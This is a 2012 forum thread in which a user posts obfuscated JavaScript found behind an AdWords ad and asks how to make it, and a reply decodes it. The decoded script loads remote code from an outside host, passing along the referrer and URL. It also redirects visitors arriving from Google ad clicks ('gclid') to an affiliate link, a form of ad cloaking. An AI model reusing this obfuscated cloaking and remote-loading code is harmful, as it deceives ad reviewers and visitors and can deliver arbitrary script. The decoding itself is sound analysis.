How to generated this script?

arancia · April 16, 2012, 8:30am

Hello,

I need to figure out how to generate this script. I discovered someone using this on adwords platform. its include redirect url but encrypted by eval vode. How can I solve this?

I think this is redirect script because if I click their ad redirect one site but copy paste display URL to adress bar redirect to another site.

Can someone enlighten me please, how to created this script?

Thanks…

<script language=“javascript” type=“text/javascript”>var _0x362a=

[“ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=”,“”,“charAt”,“indexOf”,“fromCharCode”,“length”];function _0IO(_0x6ea4x2)

{var _0x6ea4x3=_0x362a[0];var _0x6ea4x4,_0x6ea4x5,_0x6ea4x6,_0x6ea4x7,_0x6ea4x8,_0x6ea4x9,_0x6ea4xa,_0x6ea4xb,_0x6ea4xc=0,_0x6ea4xd=_0x362a

[1];do{_0x6ea4x7=_0x6ea4x3_0x362a[3];_0x6ea4x8=_0x6ea4x3[_0x362a[3]](_0x6ea4x2[_0x362a[2]](_0x6ea4xc+

+));_0x6ea4x9=_0x6ea4x3_0x362a[3];_0x6ea4xa=_0x6ea4x3[_0x362a[3]](_0x6ea4x2[_0x362a[2]](_0x6ea4xc+

+));_0x6ea4xb=_0x6ea4x7<<18|_0x6ea4x8<<12|_0x6ea4x9<<6|

_0x6ea4xa;_0x6ea4x4=_0x6ea4xb>>16&0xff;_0x6ea4x5=_0x6ea4xb>>8&0xff;_0x6ea4x6=_0x6ea4xb&0xff;if(_0x6ea4x9==64){_0x6ea4xd+=String[_0x362a[4]]

(_0x6ea4x4);} else {if(_0x6ea4xa==64){_0x6ea4xd+=String_0x362a[4];} else {_0x6ea4xd+=String[_0x362a[4]]

(_0x6ea4x4,_0x6ea4x5,_0x6ea4x6);} ;} ;} while(_0x6ea4xc<_0x6ea4x2[_0x362a[5]]);;return _0x6ea4xd;} ;function _1OO(_0x6ea4xf){var

_0x6ea4x10=_0x362a[1],_0x6ea4xc=0;for(_0x6ea4xc=_0x6ea4xf[_0x362a[5]]-1;_0x6ea4xc>=0;_0x6ea4xc–){_0x6ea4x10+=_0x6ea4xf[_0x362a[2]]

(_0x6ea4xc);} ;return _0x6ea4x10;} ;var

I0l='==wOpkSZwF2YzV2XoUGchN2cl5WdoUGdpJ3duQnbl1Wdj9GZ7kSMPlEKkxWaoNEZuVGcwFmLw80TKsTXwsVKnQWYlh2JoUWbh50ZhRVeCNHduVWblxWR0V2ZuQnbl1Wdj9GZg0DIw

80TgIXY2pwOpwkUV5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0DbyVnJnsSKyVmcyVmZlJnL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPmVmcmcyKns2b9MmczRXZn9z

Lt92YuUGdhN2c1ZmYvlXbukGch9yL6AHd0h2Jg0DIjJ3cuEzTJpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9ASMPlEIyFmd7cSRzUCdwlmcjN3LDNTJEdTJ5ATJBBTJC

NTJ3ITJvEjMxMzNvIDM3QzLw8Cev02bj5SesZmclVGcv8SQzUCc0RHa3ITJENTJu9Wa0F2YvxmL39GZul2d5ATJ5ATJBBTJCdTJ5ATJBBTJ5ITJsxWduR0MlEjMlMXZoNGdh1GOyUiZplD

MlEEMlI0MlkjMlc2LklGbjdmRzUyQ1UyL4ITJoNGdh1mL6xmc1BHMyUCRzUCMyUyclh2Y0FWbwITJyFmd5ATJBBTJCNTJMJVVuQnbl1Wdj9GZwITJENTJwITJ6xmc1BHMyUichZXRzUCdw

lmcjN3QzUyJ9UGchN2cl9FIyFmd’;eval(_0IO(_1OO(I0l)));</script>

Paul_Wilkins · April 16, 2012, 1:11pm

You can solve it by logging the value to be eval’d, which ends up being:


var _escape='%3Cscript%3Evar%20purlz%20%3D%20document.URL%3B%0A%09var%20matches%20%3D%20purlz.match%28/%5C%3Fgclid/g%29%3B%0A%09if%28matches%21%3Dnull%29%0A%09%7B%0A%09%09window.location%3D%27http%3A//peerfly.com/x/0/4702/73121/%27%3B%0A%09%7D%3C/script%3E';
var IO1 = document.createElement('script');
IO1.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);
var OO0 = document.getElementsByTagName('head')[0];
OO0.appendChild(IO1);
document.write(unescape(_escape));

Which you can unescape to find out that it performs the following check:


var purlz = document.URL;
var matches = purlz.match(/\\?gclid/g);
if (matches != null) {
    window.location = 'http://peerfly.com/x/0/4702/73121/';
}